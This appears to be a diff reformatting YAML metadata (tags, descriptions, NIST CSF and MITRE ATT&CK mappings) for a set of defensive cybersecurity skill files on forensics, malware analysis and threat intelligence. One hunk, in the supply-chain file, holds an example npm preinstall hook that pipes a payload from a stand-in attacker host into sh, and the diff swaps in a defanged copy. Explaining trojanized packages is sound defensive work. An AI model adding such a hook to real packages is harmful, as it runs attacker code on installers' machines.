 domain: cybersecurity
 subdomain: security-operations
-tags: [analyzing, memory, forensics, with]
+tags:
-version: "1.0"
+- memory-forensics
 - linux-forensics
 - lime
 - volatility
 - incident-response
 - kernel-modules
 version: '1.0'
 author: mahipal
 license: Apache-2.0
 nist_csf:
 - DE.CM-01
 - RS.MA-01
 - GV.OV-01
 - DE.AE-02
 mitre_attack:
 - T1055
 - T1003.001
 - T1620
 - T1564.001
 ---
 # Analyzing Memory Forensics with LiME and Volatility
@@ -1,12 +1,33 @@
 ---
 name: analyzing-mft-for-deleted-file-recovery
-description: Analyze the NTFS Master File Table ($MFT) to recover metadata and content of deleted files by examining MFT record entries, $LogFile, $UsnJrnl, and MFT slack space using MFTECmd, analyzeMFT, and X-Ways Forensics.
+description: Analyze the NTFS Master File Table ($MFT) to recover metadata and content
  of deleted files by examining MFT record entries, $LogFile, $UsnJrnl, and MFT slack
  space using MFTECmd, analyzeMFT, and X-Ways Forensics.
 domain: cybersecurity
 subdomain: digital-forensics
-tags: [mft, ntfs, deleted-files, file-recovery, mftecmd, usn-journal, logfile, mft-slack-space, file-system-forensics, dfir]
+tags:
-version: "1.0"
+- mft
 - ntfs
 - deleted-files
 - file-recovery
 - mftecmd
 - usn-journal
 - logfile
 - mft-slack-space
 - file-system-forensics
 - dfir
 version: '1.0'
 author: mahipal
 license: Apache-2.0
 nist_csf:
 - RS.AN-01
 - RS.AN-03
 - DE.AE-02
 - RS.MA-01
 mitre_attack:
 - T1070.004
 - T1070.006
 - T1005
 ---
 # Analyzing MFT for Deleted File Recovery
@@ -1,12 +1,37 @@
 ---
 name: analyzing-network-covert-channels-in-malware
-description: Detect and analyze covert communication channels used by malware including DNS tunneling, ICMP exfiltration, steganographic HTTP, and protocol abuse for C2 and data exfiltration.
+description: Detect and analyze covert communication channels used by malware including
  DNS tunneling, ICMP exfiltration, steganographic HTTP, and protocol abuse for C2
  and data exfiltration.
 domain: cybersecurity
 subdomain: malware-analysis
-tags: [covert-channels, dns-tunneling, icmp-exfiltration, malware-analysis, network-forensics, c2-detection, data-exfiltration]
+tags:
-version: "1.0"
+- covert-channels
 - dns-tunneling
 - icmp-exfiltration
 - malware-analysis
 - network-forensics
 - c2-detection
 - data-exfiltration
 version: '1.0'
 author: mahipal
 license: Apache-2.0
 d3fend_techniques:
 - File Metadata Consistency Validation
 - Certificate Analysis
 - Application Protocol Command Analysis
 - Content Format Conversion
 - File Content Analysis
 nist_csf:
 - DE.AE-02
 - RS.AN-03
 - ID.RA-01
 - DE.CM-01
 mitre_attack:
 - T1071.001
 - T1095
 - T1572
 - T1001
 ---
 # Analyzing Network Covert Channels in Malware
@@ -1,16 +1,30 @@
 ---
 name: analyzing-network-flow-data-with-netflow
-description: >-
+description: Parse NetFlow v9 and IPFIX records to detect volumetric anomalies, port
-  Parse NetFlow v9 and IPFIX records to detect volumetric anomalies, port scanning, data
+  scanning, data exfiltration, and C2 beaconing patterns. Uses the Python netflow
-  exfiltration, and C2 beaconing patterns. Uses the Python netflow library to decode flow
+  library to decode flow records, builds traffic baselines, and applies statistical
-  records, builds traffic baselines, and applies statistical analysis to identify flows
+  analysis to identify flows with abnormal byte counts, connection durations, and
-  with abnormal byte counts, connection durations, and periodic timing patterns.
+  periodic timing patterns.
 domain: cybersecurity
 subdomain: network-security
-tags: [analyzing, network, flow, data]
+tags:
-version: "1.0"
+- analyzing
 - network
 - flow
 - data
 version: '1.0'
 author: mahipal
 license: Apache-2.0
 nist_csf:
 - PR.IR-01
 - DE.CM-01
 - ID.AM-03
 - PR.DS-02
 mitre_attack:
 - T1071
 - T1048
 - T1046
 - T1095
 ---
@@ -1,18 +1,30 @@
 ---
 name: analyzing-network-packets-with-scapy
-description: Craft, send, sniff, and dissect network packets using Scapy for protocol analysis, network reconnaissance, and traffic anomaly detection in authorized security testing
+description: Craft, send, sniff, and dissect network packets using Scapy for protocol
  analysis, network reconnaissance, and traffic anomaly detection in authorized security
  testing
 domain: cybersecurity
 subdomain: network-security
 tags:
-  - scapy
+- scapy
-  - packet-analysis
+- packet-analysis
-  - network-forensics
+- network-forensics
-  - protocol-dissection
+- protocol-dissection
-  - pcap
+- pcap
-  - traffic-analysis
+- traffic-analysis
-version: "1.0"
+version: '1.0'
 author: mahipal
 license: Apache-2.0
 nist_csf:
 - PR.IR-01
 - DE.CM-01
 - ID.AM-03
 - PR.DS-02
 mitre_attack:
 - T1040
 - T1071
 - T1046
 - T1557
 ---
 # Analyzing Network Packets with Scapy
@@ -1,18 +1,32 @@
 ---
 name: analyzing-network-traffic-for-incidents
-description: >
+description: 'Analyzes network traffic captures and flow data to identify adversary activity during security incidents, including
-  Analyzes network traffic captures and flow data to identify adversary activity during
+  command-and-control communications, lateral movement, data exfiltration, and exploitation attempts. Uses Wireshark, Zeek,
-  security incidents, including command-and-control communications, lateral movement,
+  and NetFlow analysis techniques. Activates for requests involving network traffic analysis, packet capture investigation,
-  data exfiltration, and exploitation attempts. Uses Wireshark, Zeek, and NetFlow
+  PCAP analysis, network forensics, C2 traffic detection, or exfiltration detection.
-  analysis techniques. Activates for requests involving network traffic analysis,
+
-  packet capture investigation, PCAP analysis, network forensics, C2 traffic detection,
+  '
  or exfiltration detection.
 domain: cybersecurity
 subdomain: incident-response
-tags: [network-forensics, PCAP-analysis, Wireshark, Zeek, traffic-analysis]
+tags:
 - network-forensics
 - PCAP-analysis
 - Wireshark
 - Zeek
 - traffic-analysis
 mitre_attack:
 - T1071
 - T1095
 - T1573
 - T1572
 version: 1.0.0
 author: mahipal
 license: Apache-2.0
 nist_csf:
 - RS.MA-01
 - RS.MA-02
 - RS.AN-03
 - RC.RP-01
 ---
 # Analyzing Network Traffic for Incidents
@@ -1,17 +1,33 @@
 ---
 name: analyzing-network-traffic-of-malware
-description: >
+description: 'Analyzes network traffic generated by malware during sandbox execution
-  Analyzes network traffic generated by malware during sandbox execution or live incident
+  or live incident response to identify C2 protocols, data exfiltration channels,
-  response to identify C2 protocols, data exfiltration channels, payload downloads, and
+  payload downloads, and lateral movement patterns using Wireshark, Zeek, and Suricata.
-  lateral movement patterns using Wireshark, Zeek, and Suricata. Activates for requests
+  Activates for requests involving malware network analysis, C2 traffic decoding,
-  involving malware network analysis, C2 traffic decoding, malware PCAP analysis, or
+  malware PCAP analysis, or network-based malware detection.
-  network-based malware detection.
+
  '
 domain: cybersecurity
 subdomain: malware-analysis
-tags: [malware, network-analysis, PCAP, Wireshark, C2-detection]
+tags:
 - malware
 - network-analysis
 - PCAP
 - Wireshark
 - C2-detection
 version: 1.0.0
 author: mahipal
 license: Apache-2.0
 nist_csf:
 - DE.AE-02
 - RS.AN-03
 - ID.RA-01
 - DE.CM-01
 mitre_attack:
 - T1071.001
 - T1571
 - T1573
 - T1095
 ---
 # Analyzing Network Traffic of Malware
@@ -1,15 +1,31 @@
 ---
 name: analyzing-network-traffic-with-wireshark
-description: >
+description: 'Captures and analyzes network packet data using Wireshark and tshark
-  Captures and analyzes network packet data using Wireshark and tshark to identify
+  to identify malicious traffic patterns, diagnose protocol issues, extract artifacts,
-  malicious traffic patterns, diagnose protocol issues, extract artifacts, and
+  and support incident response investigations on authorized network segments.
-  support incident response investigations on authorized network segments.
+
  '
 domain: cybersecurity
 subdomain: network-security
-tags: [network-security, wireshark, packet-analysis, traffic-analysis, pcap]
+tags:
-version: "1.0"
+- network-security
 - wireshark
 - packet-analysis
 - traffic-analysis
 - pcap
 version: '1.0'
 author: mahipal
 license: Apache-2.0
 nist_csf:
 - PR.IR-01
 - DE.CM-01
 - ID.AM-03
 - PR.DS-02
 mitre_attack:
 - T1040
 - T1071
 - T1557
 - T1046
 ---
 # Analyzing Network Traffic with Wireshark
@@ -1,12 +1,31 @@
 ---
 name: analyzing-office365-audit-logs-for-compromise
-description: Parse Office 365 Unified Audit Logs via Microsoft Graph API to detect email forwarding rule creation, inbox delegation, suspicious OAuth app grants, and other indicators of account compromise.
+description: Parse Office 365 Unified Audit Logs via Microsoft Graph API to detect
  email forwarding rule creation, inbox delegation, suspicious OAuth app grants, and
  other indicators of account compromise.
 domain: cybersecurity
 subdomain: cloud-security
-tags: [Office365, Microsoft-Graph, audit-logs, email-compromise, inbox-rules, OAuth, BEC]
+tags:
-version: "1.0"
+- Office365
 - Microsoft-Graph
 - audit-logs
 - email-compromise
 - inbox-rules
 - OAuth
 - BEC
 version: '1.0'
 author: mahipal
 license: Apache-2.0
 nist_csf:
 - PR.IR-01
 - ID.AM-08
 - GV.SC-06
 - DE.CM-01
 mitre_attack:
 - T1114.002
 - T1098.002
 - T1556.006
 - T1078.004
 ---
 # Analyzing Office 365 Audit Logs for Compromise
@@ -1,12 +1,38 @@
 ---
 name: analyzing-outlook-pst-for-email-forensics
-description: Analyze Microsoft Outlook PST and OST files for email forensic evidence including message content, headers, attachments, deleted items, and metadata using libpff, pst-utils, and forensic email analysis tools for legal investigations and incident response.
+description: Analyze Microsoft Outlook PST and OST files for email forensic evidence
  including message content, headers, attachments, deleted items, and metadata using
  libpff, pst-utils, and forensic email analysis tools for legal investigations and
  incident response.
 domain: cybersecurity
 subdomain: digital-forensics
-tags: [email-forensics, pst, ost, outlook, mapi, email-headers, attachments, deleted-emails, libpff, eml-extraction]
+tags:
-version: "1.0"
+- email-forensics
 - pst
 - ost
 - outlook
 - mapi
 - email-headers
 - attachments
 - deleted-emails
 - libpff
 - eml-extraction
 version: '1.0'
 author: mahipal
 license: Apache-2.0
 nist_ai_rmf:
 - MANAGE-2.4
 - MANAGE-3.1
 - MEASURE-3.1
 nist_csf:
 - RS.AN-01
 - RS.AN-03
 - DE.AE-02
 - RS.MA-01
 mitre_attack:
 - T1114.001
 - T1564.008
 - T1070.008
 ---
 # Analyzing Outlook PST for Email Forensics
@@ -1,16 +1,32 @@
 ---
 name: analyzing-packed-malware-with-upx-unpacker
-description: >
+description: 'Identifies and unpacks UPX-packed and other packed malware samples to
-  Identifies and unpacks UPX-packed and other packed malware samples to expose the original
+  expose the original executable code for static analysis. Covers both standard UPX
-  executable code for static analysis. Covers both standard UPX unpacking and handling
+  unpacking and handling modified UPX headers that prevent automated decompression.
-  modified UPX headers that prevent automated decompression. Activates for requests involving
+  Activates for requests involving malware unpacking, UPX decompression, packer removal,
-  malware unpacking, UPX decompression, packer removal, or preparing packed samples for analysis.
+  or preparing packed samples for analysis.
  '
 domain: cybersecurity
 subdomain: malware-analysis
-tags: [malware, unpacking, UPX, packing, static-analysis]
+tags:
 - malware
 - unpacking
 - UPX
 - packing
 - static-analysis
 version: 1.0.0
 author: mahipal
 license: Apache-2.0
 nist_csf:
 - DE.AE-02
 - RS.AN-03
 - ID.RA-01
 - DE.CM-01
 mitre_attack:
 - T1027.002
 - T1140
 - T1620
 ---
 # Analyzing Packed Malware with UPX Unpacker
@@ -1,17 +1,33 @@
 ---
 name: analyzing-pdf-malware-with-pdfid
-description: >
+description: 'Analyzes malicious PDF files using PDFiD, pdf-parser, and peepdf to
-  Analyzes malicious PDF files using PDFiD, pdf-parser, and peepdf to identify embedded
+  identify embedded JavaScript, shellcode, exploits, and suspicious objects without
-  JavaScript, shellcode, exploits, and suspicious objects without opening the document.
+  opening the document. Determines the attack vector and extracts embedded payloads
-  Determines the attack vector and extracts embedded payloads for further analysis.
+  for further analysis. Activates for requests involving PDF malware analysis, malicious
-  Activates for requests involving PDF malware analysis, malicious document analysis,
+  document analysis, PDF exploit investigation, or suspicious attachment triage.
-  PDF exploit investigation, or suspicious attachment triage.
+
  '
 domain: cybersecurity
 subdomain: malware-analysis
-tags: [malware, PDF-analysis, document-malware, PDFiD, static-analysis]
+tags:
 - malware
 - PDF-analysis
 - document-malware
 - PDFiD
 - static-analysis
 version: 1.0.0
 author: mahipal
 license: Apache-2.0
 nist_csf:
 - DE.AE-02
 - RS.AN-03
 - ID.RA-01
 - DE.CM-01
 mitre_attack:
 - T1204.002
 - T1566.001
 - T1059.007
 - T1027
 ---
 # Analyzing PDF Malware with PDFiD
@@ -1,12 +1,38 @@
 ---
 name: analyzing-persistence-mechanisms-in-linux
-description: Detect and analyze Linux persistence mechanisms including crontab entries, systemd service units, LD_PRELOAD hijacking, bashrc modifications, and authorized_keys backdoors using auditd and file integrity monitoring
+description: Detect and analyze Linux persistence mechanisms including crontab entries,
  systemd service units, LD_PRELOAD hijacking, bashrc modifications, and authorized_keys
  backdoors using auditd and file integrity monitoring
 domain: cybersecurity
 subdomain: threat-hunting
-tags: [linux-persistence, crontab, systemd, ld-preload, auditd, threat-hunting, incident-response]
+tags:
-version: "1.0"
+- linux-persistence
 - crontab
 - systemd
 - ld-preload
 - auditd
 - threat-hunting
 - incident-response
 mitre_attack:
 - T1053.003
 - T1543.002
 - T1574.006
 - T1546.004
 - T1098.004
 version: '1.0'
 author: mahipal
 license: Apache-2.0
 d3fend_techniques:
 - Executable Denylisting
 - Execution Isolation
 - File Metadata Consistency Validation
 - Process Termination
 - Content Format Conversion
 nist_csf:
 - DE.CM-01
 - DE.AE-02
 - DE.AE-07
 - ID.RA-05
 ---
 # Analyzing Persistence Mechanisms in Linux
@@ -1,12 +1,44 @@
 ---
 name: analyzing-powershell-empire-artifacts
-description: Detect PowerShell Empire framework artifacts in Windows event logs by identifying Base64 encoded launcher patterns, default user agents, staging URL structures, stager IOCs, and known Empire module signatures in Script Block Logging events.
+description: Detect PowerShell Empire framework artifacts in Windows event logs by
  identifying Base64 encoded launcher patterns, default user agents, staging URL structures,
  stager IOCs, and known Empire module signatures in Script Block Logging events.
 domain: cybersecurity
 subdomain: threat-hunting
-tags: [PowerShell-Empire, threat-hunting, Script-Block-Logging, base64, stager, C2, MITRE-ATT&CK, T1059.001, forensics]
+tags:
-version: "1.0"
+- PowerShell-Empire
 - threat-hunting
 - Script-Block-Logging
 - base64
 - stager
 - C2
 - MITRE-ATT&CK
 - T1059.001
 - forensics
 version: '1.0'
 author: mahipal
 license: Apache-2.0
 d3fend_techniques:
 - Executable Denylisting
 - Execution Isolation
 - File Metadata Consistency Validation
 - Content Format Conversion
 - File Content Analysis
 nist_ai_rmf:
 - GOVERN-1.1
 - MEASURE-2.7
 - MANAGE-3.1
 nist_csf:
 - DE.CM-01
 - DE.AE-02
 - DE.AE-07
 - ID.RA-05
 mitre_attack:
 - T1059.001
 - T1071.001
 - T1003.001
 - T1558.003
 - T1027.010
 ---
 # Analyzing PowerShell Empire Artifacts
@@ -1,16 +1,32 @@
 ---
 name: analyzing-powershell-script-block-logging
-description: >-
+description: Parse Windows PowerShell Script Block Logs (Event ID 4104) from EVTX
-  Parse Windows PowerShell Script Block Logs (Event ID 4104) from EVTX files to detect obfuscated
+  files to detect obfuscated commands, encoded payloads, and living-off-the-land techniques.
-  commands, encoded payloads, and living-off-the-land techniques. Uses python-evtx to extract and
+  Uses python-evtx to extract and reconstruct multi-block scripts, applies entropy
-  reconstruct multi-block scripts, applies entropy analysis and pattern matching for Base64-encoded
+  analysis and pattern matching for Base64-encoded commands, Invoke-Expression abuse,
-  commands, Invoke-Expression abuse, download cradles, and AMSI bypass attempts.
+  download cradles, and AMSI bypass attempts.
 domain: cybersecurity
 subdomain: security-operations
-tags: [analyzing, powershell, script, block]
+tags:
-version: "1.0"
+- powershell
 - script-block-logging
 - event-id-4104
 - obfuscation-detection
 - windows-forensics
 - endpoint-security
 version: '1.0'
 author: mahipal
 license: Apache-2.0
 nist_csf:
 - DE.CM-01
 - RS.MA-01
 - GV.OV-01
 - DE.AE-02
 mitre_attack:
 - T1059.001
 - T1027.010
 - T1140
 - T1105
 ---
@@ -1,12 +1,29 @@
 ---
 name: analyzing-prefetch-files-for-execution-history
-description: Parse Windows Prefetch files to determine program execution history including run counts, timestamps, and referenced files for forensic investigation.
+description: Parse Windows Prefetch files to determine program execution history including
  run counts, timestamps, and referenced files for forensic investigation.
 domain: cybersecurity
 subdomain: digital-forensics
-tags: [forensics, prefetch, windows-artifacts, execution-history, timeline-analysis, evidence-collection]
+tags:
-version: "1.0"
+- forensics
 - prefetch
 - windows-artifacts
 - execution-history
 - timeline-analysis
 - evidence-collection
 version: '1.0'
 author: mahipal
 license: Apache-2.0
 nist_csf:
 - RS.AN-01
 - RS.AN-03
 - DE.AE-02
 - RS.MA-01
 mitre_attack:
 - T1059.001
 - T1003.001
 - T1021.002
 - T1567.002
 ---
 # Analyzing Prefetch Files for Execution History
@@ -1,17 +1,51 @@
 ---
 name: analyzing-ransomware-encryption-mechanisms
-description: >
+description: 'Analyzes encryption algorithms, key management, and file encryption
-  Analyzes encryption algorithms, key management, and file encryption routines used by
+  routines used by ransomware families to assess decryption feasibility, identify
-  ransomware families to assess decryption feasibility, identify implementation weaknesses,
+  implementation weaknesses, and support recovery efforts. Covers AES, RSA, ChaCha20,
-  and support recovery efforts. Covers AES, RSA, ChaCha20, and hybrid encryption schemes.
+  and hybrid encryption schemes. Activates for requests involving ransomware cryptanalysis,
-  Activates for requests involving ransomware cryptanalysis, encryption analysis, key
+  encryption analysis, key recovery assessment, or ransomware decryption feasibility.
-  recovery assessment, or ransomware decryption feasibility.
+
  '
 domain: cybersecurity
 subdomain: malware-analysis
-tags: [malware, ransomware, encryption, cryptanalysis, reverse-engineering]
+tags:
 - malware
 - ransomware
 - encryption
 - cryptanalysis
 - reverse-engineering
 version: 1.0.0
 author: mahipal
 license: Apache-2.0
 nist_csf:
 - DE.AE-02
 - RS.AN-03
 - ID.RA-01
 - DE.CM-01
 mitre_attack:
 - T1486
 - T1573.001
 - T1573.002
 - T1027
 mitre_f3:
  version: '1.1'
  tactics:
  - monetization
  - positioning
  techniques:
  - id: F1018
    name: Convert to Cryptocurrency
    tactic: monetization
    source: f3
  - id: F1047
    name: Transfer of funds
    tactic: monetization
    source: f3
  - id: T1219
    name: Remote Access Tools
    tactic: positioning
    source: attack
 ---
 # Analyzing Ransomware Encryption Mechanisms
@@ -1,12 +1,54 @@
 ---
 name: analyzing-ransomware-leak-site-intelligence
-description: Monitor and analyze ransomware group data leak sites (DLS) to track victim postings, extract threat intelligence on group tactics, and assess sector-specific ransomware risk for proactive defense.
+description: Monitor and analyze ransomware group data leak sites (DLS) to track victim
  postings, extract threat intelligence on group tactics, and assess sector-specific
  ransomware risk for proactive defense.
 domain: cybersecurity
 subdomain: threat-intelligence
-tags: [ransomware, leak-site, data-leak, extortion, threat-intelligence, monitoring, dls, victim-tracking]
+tags:
-version: "1.0"
+- ransomware
 - leak-site
 - data-leak
 - extortion
 - threat-intelligence
 - leak-site-monitoring
 - dls
 - victim-tracking
 version: '1.0'
 author: mahipal
 license: Apache-2.0
 nist_csf:
 - ID.RA-01
 - ID.RA-05
 - DE.CM-01
 - DE.AE-02
 mitre_attack:
 - T1657
 - T1486
 - T1567.002
 - T1591
 mitre_f3:
  version: '1.1'
  tactics:
  - monetization
  - reconnaissance
  techniques:
  - id: F1018
    name: Convert to Cryptocurrency
    tactic: monetization
    source: f3
  - id: F1029
    name: Gather Customer Information
    tactic: reconnaissance
    source: f3
  - id: T1593
    name: Search Open Websites/Domains
    tactic: reconnaissance
    source: attack
  - id: F1025.003
    name: 'Electronic Funds Transfer: Wire Transfer'
    tactic: monetization
    source: f3
 ---
 # Analyzing Ransomware Leak Site Intelligence
@@ -1,12 +1,56 @@
 ---
 name: analyzing-ransomware-network-indicators
-description: Identify ransomware network indicators including C2 beaconing patterns, TOR exit node connections, data exfiltration flows, and encryption key exchange via Zeek conn.log and NetFlow analysis
+description: Identify ransomware network indicators including C2 beaconing patterns,
  TOR exit node connections, data exfiltration flows, and encryption key exchange
  via Zeek conn.log and NetFlow analysis
 domain: cybersecurity
 subdomain: threat-hunting
-tags: [ransomware, c2-beaconing, zeek, netflow, tor, exfiltration, network-forensics]
+tags:
-version: "1.0"
+- ransomware
 - c2-beaconing
 - zeek
 - netflow
 - tor
 - exfiltration
 - network-forensics
 version: '1.0'
 author: mahipal
 license: Apache-2.0
 d3fend_techniques:
 - File Metadata Consistency Validation
 - Certificate Analysis
 - Application Protocol Command Analysis
 - Content Format Conversion
 - File Content Analysis
 nist_csf:
 - DE.CM-01
 - DE.AE-02
 - DE.AE-07
 - ID.RA-05
 mitre_attack:
 - T1071.001
 - T1573
 - T1048
 - T1567.002
 - T1486
 mitre_f3:
  version: '1.1'
  tactics:
  - positioning
  - monetization
  techniques:
  - id: T1219
    name: Remote Access Tools
    tactic: positioning
    source: attack
  - id: F1018
    name: Convert to Cryptocurrency
    tactic: monetization
    source: f3
  - id: F1047
    name: Transfer of funds
    tactic: monetization
    source: f3
 ---
 # Analyzing Ransomware Network Indicators
@@ -1,18 +1,59 @@
 ---
 name: analyzing-ransomware-payment-wallets
-description: >
+description: 'Traces ransomware cryptocurrency payment flows using blockchain analysis
-  Traces ransomware cryptocurrency payment flows using blockchain analysis tools
+  tools such as Chainalysis Reactor, WalletExplorer, and blockchain.com APIs. Identifies
  such as Chainalysis Reactor, WalletExplorer, and blockchain.com APIs. Identifies
  wallet clusters, tracks fund movement through mixers and exchanges, and supports
  law enforcement attribution. Activates for requests involving ransomware payment
-  tracing, bitcoin wallet analysis, cryptocurrency forensics, or blockchain
+  tracing, bitcoin wallet analysis, cryptocurrency forensics, or blockchain intelligence
-  intelligence gathering.
+  gathering.
  '
 domain: cybersecurity
 subdomain: ransomware-defense
-tags: [ransomware, blockchain, cryptocurrency, forensics, threat-intelligence, bitcoin]
+tags:
 - ransomware
 - blockchain
 - cryptocurrency
 - forensics
 - threat-intelligence
 - bitcoin
 version: 1.0.0
 author: mahipal
 license: Apache-2.0
 nist_csf:
 - PR.DS-11
 - RS.MA-01
 - RC.RP-01
 - PR.IR-01
 mitre_attack:
 - T1657
 - T1486
 mitre_f3:
  version: '1.1'
  tactics:
  - monetization
  - stealth
  techniques:
  - id: F1018
    name: Convert to Cryptocurrency
    tactic: monetization
    source: f3
  - id: F1017
    name: Conversion to Physical Monetary Instruments
    tactic: monetization
    source: f3
  - id: F1017.001
    name: 'Conversion to Physical Monetary Instruments: Cash'
    tactic: monetization
    source: f3
  - id: F1047
    name: Transfer of funds
    tactic: monetization
    source: f3
  - id: F1045
    name: Structuring
    tactic: stealth
    source: f3
 ---
 # Analyzing Ransomware Payment Wallets
@@ -1,18 +1,48 @@
 ---
 name: analyzing-sbom-for-supply-chain-vulnerabilities
-description: >
+description: 'Parses Software Bill of Materials (SBOM) in CycloneDX and SPDX JSON
-  Parses Software Bill of Materials (SBOM) in CycloneDX and SPDX JSON formats to identify
+  formats to identify supply chain vulnerabilities by correlating components against
-  supply chain vulnerabilities by correlating components against the NVD CVE database via
+  the NVD CVE database via the NVD 2.0 API. Builds dependency graphs, calculates risk
-  the NVD 2.0 API. Builds dependency graphs, calculates risk scores, identifies transitive
+  scores, identifies transitive vulnerability paths, and generates compliance reports.
-  vulnerability paths, and generates compliance reports. Activates for requests involving
+  Activates for requests involving SBOM analysis, software composition analysis, supply
-  SBOM analysis, software composition analysis, supply chain security assessment, dependency
+  chain security assessment, dependency vulnerability scanning, CycloneDX/SPDX parsing,
-  vulnerability scanning, CycloneDX/SPDX parsing, or CVE correlation.
+  or CVE correlation.
  '
 domain: cybersecurity
 subdomain: supply-chain-security
-tags: [SBOM, CycloneDX, SPDX, NVD, CVE, supply-chain, dependency-analysis, syft, grype]
+tags:
 - SBOM
 - CycloneDX
 - SPDX
 - NVD
 - CVE
 - supply-chain
 - dependency-analysis
 - syft
 - grype
 version: 1.0.0
 author: mukul975
 license: Apache-2.0
 atlas_techniques:
 - AML.T0010
 - AML.T0104
 nist_ai_rmf:
 - GOVERN-5.2
 - MAP-1.6
 - MANAGE-2.2
 - GOVERN-1.1
 - GOVERN-4.2
 nist_csf:
 - GV.SC-01
 - GV.SC-03
 - GV.SC-06
 - GV.SC-07
 mitre_attack:
 - T1195.001
 - T1195.002
 - T1554
 - T1190
 ---
 # Analyzing SBOM for Supply Chain Vulnerabilities
@@ -1,18 +1,51 @@
 ---
 name: analyzing-security-logs-with-splunk
-description: >
+description: 'Leverages Splunk Enterprise Security and SPL (Search Processing Language)
-  Leverages Splunk Enterprise Security and SPL (Search Processing Language) to
+  to investigate security incidents through log correlation, timeline reconstruction,
  investigate security incidents through log correlation, timeline reconstruction,
  and anomaly detection. Covers Windows event logs, firewall logs, proxy logs, and
  authentication data analysis. Activates for requests involving Splunk investigation,
  SPL queries, SIEM log analysis, security event correlation, or log-based incident
  investigation.
  '
 domain: cybersecurity
 subdomain: incident-response
-tags: [splunk, SPL, SIEM, log-analysis, security-monitoring]
+tags:
 - splunk
 - SPL
 - SIEM
 - log-analysis
 - security-monitoring
 mitre_attack:
 - T1110
 - T1550.002
 - T1021.001
 - T1059.001
 - T1003.001
 version: 1.0.0
 author: mahipal
 license: Apache-2.0
 atlas_techniques:
 - AML.T0070
 - AML.T0066
 - AML.T0082
 d3fend_techniques:
 - Executable Denylisting
 - Execution Isolation
 - File Metadata Consistency Validation
 - Content Format Conversion
 - File Content Analysis
 nist_ai_rmf:
 - MEASURE-2.7
 - MAP-5.1
 - MANAGE-2.4
 - MANAGE-3.1
 - MEASURE-3.1
 nist_csf:
 - RS.MA-01
 - RS.MA-02
 - RS.AN-03
 - RC.RP-01
 ---
 # Analyzing Security Logs with Splunk
@@ -1,12 +1,31 @@
 ---
 name: analyzing-slack-space-and-file-system-artifacts
-description: Examine file system slack space, MFT entries, USN journal, and alternate data streams to recover hidden data and reconstruct file activity on NTFS volumes.
+description: Examine file system slack space, MFT entries, USN journal, and alternate
  data streams to recover hidden data and reconstruct file activity on NTFS volumes.
 domain: cybersecurity
 subdomain: digital-forensics
-tags: [forensics, slack-space, ntfs, mft, usn-journal, alternate-data-streams, file-system-analysis]
+tags:
-version: "1.0"
+- forensics
 - slack-space
 - ntfs
 - mft
 - usn-journal
 - alternate-data-streams
 - file-system-analysis
 version: '1.0'
 author: mahipal
 license: Apache-2.0
 nist_csf:
 - RS.AN-01
 - RS.AN-03
 - DE.AE-02
 - RS.MA-01
 mitre_attack:
 - T1070.006
 - T1564.004
 - T1070.004
 - T1005
 - T1006
 ---
 # Analyzing Slack Space and File System Artifacts
@@ -1,12 +1,45 @@
 ---
 name: analyzing-supply-chain-malware-artifacts
-description: Investigate supply chain attack artifacts including trojanized software updates, compromised build pipelines, and sideloaded dependencies to identify intrusion vectors and scope of compromise.
+description: Investigate supply chain attack artifacts including trojanized software
  updates, compromised build pipelines, and sideloaded dependencies to identify intrusion
  vectors and scope of compromise.
 domain: cybersecurity
 subdomain: malware-analysis
-tags: [supply-chain, malware-analysis, trojanized-software, solarwinds, 3cx, dependency-confusion, software-integrity]
+tags:
-version: "1.0"
+- supply-chain
 - malware-analysis
 - trojanized-software
 - solarwinds
 - 3cx
 - dependency-confusion
 - software-integrity
 version: '1.0'
 author: mahipal
 license: Apache-2.0
 atlas_techniques:
 - AML.T0010
 - AML.T0104
 nist_ai_rmf:
 - GOVERN-5.2
 - MAP-1.6
 - MANAGE-2.2
 d3fend_techniques:
 - Platform Hardening
 - Hardware Component Inventory
 - Restore Object
 - Electromagnetic Radiation Hardening
 - RF Shielding
 nist_csf:
 - DE.AE-02
 - RS.AN-03
 - ID.RA-01
 - DE.CM-01
 mitre_attack:
 - T1195.002
 - T1195.001
 - T1554
 - T1553.002
 - T1027
 ---
 # Analyzing Supply Chain Malware Artifacts
@@ -77,7 +77,7 @@ cosign verify-blob --signature file.sig --certificate file.crt artifact.tar.gz
 ```json
 {
  "scripts": {
-    "preinstall": "curl evil.com/payload | sh",
+    "preinstall": "curl evil[.]example/payload | sh",
    "postinstall": "node ./install.js",
    "preuninstall": "node cleanup.js"
  }
@@ -1,12 +1,38 @@
 ---
 name: analyzing-threat-actor-ttps-with-mitre-attack
-description: MITRE ATT&CK is a globally-accessible knowledge base of adversary tactics, techniques, and procedures (TTPs) based on real-world observations. This skill covers systematically mapping threat actor beh
+description: MITRE ATT&CK is a globally-accessible knowledge base of adversary tactics,
  techniques, and procedures (TTPs) based on real-world observations. This skill covers
  systematically mapping threat actor beh
 domain: cybersecurity
 subdomain: threat-intelligence
-tags: [threat-intelligence, cti, ioc, mitre-attack, stix, ttp-analysis, threat-actors]
+tags:
-version: "1.0"
+- threat-intelligence
 - cti
 - ioc
 - mitre-attack
 - stix
 - ttp-analysis
 - threat-actors
 version: '1.0'
 author: mahipal
 license: Apache-2.0
 d3fend_techniques:
 - Executable Denylisting
 - Execution Isolation
 - File Metadata Consistency Validation
 - Content Format Conversion
 - File Content Analysis
 nist_csf:
 - ID.RA-01
 - ID.RA-05
 - DE.CM-01
 - DE.AE-02
 mitre_attack:
 - T1566.001
 - T1059.001
 - T1071.001
 - T1547.001
 - T1053.005
 ---
 # Analyzing Threat Actor TTPs with MITRE ATT&CK
@@ -1,18 +1,51 @@
 ---
 name: analyzing-threat-actor-ttps-with-mitre-navigator
-description: >
+description: 'Map advanced persistent threat (APT) group tactics, techniques, and
-  Map advanced persistent threat (APT) group tactics, techniques, and procedures (TTPs) to
+  procedures (TTPs) to the MITRE ATT&CK framework using the ATT&CK Navigator and attackcti
-  the MITRE ATT&CK framework using the ATT&CK Navigator and attackcti Python library. The
+  Python library. The analyst queries STIX/TAXII data for group-technique associations,
-  analyst queries STIX/TAXII data for group-technique associations, generates Navigator layer
+  generates Navigator layer files for visualization, and compares defensive coverage
-  files for visualization, and compares defensive coverage against adversary profiles.
+  against adversary profiles. Activates for requests involving APT TTP mapping, ATT&CK
-  Activates for requests involving APT TTP mapping, ATT&CK Navigator layers, threat actor
+  Navigator layers, threat actor profiling, or MITRE technique coverage analysis.
-  profiling, or MITRE technique coverage analysis.
+
  '
 domain: cybersecurity
 subdomain: threat-intelligence
-tags: [mitre-attack, navigator, threat-intelligence, apt, ttp-mapping, stix, attackcti]
+tags:
-version: "1.0"
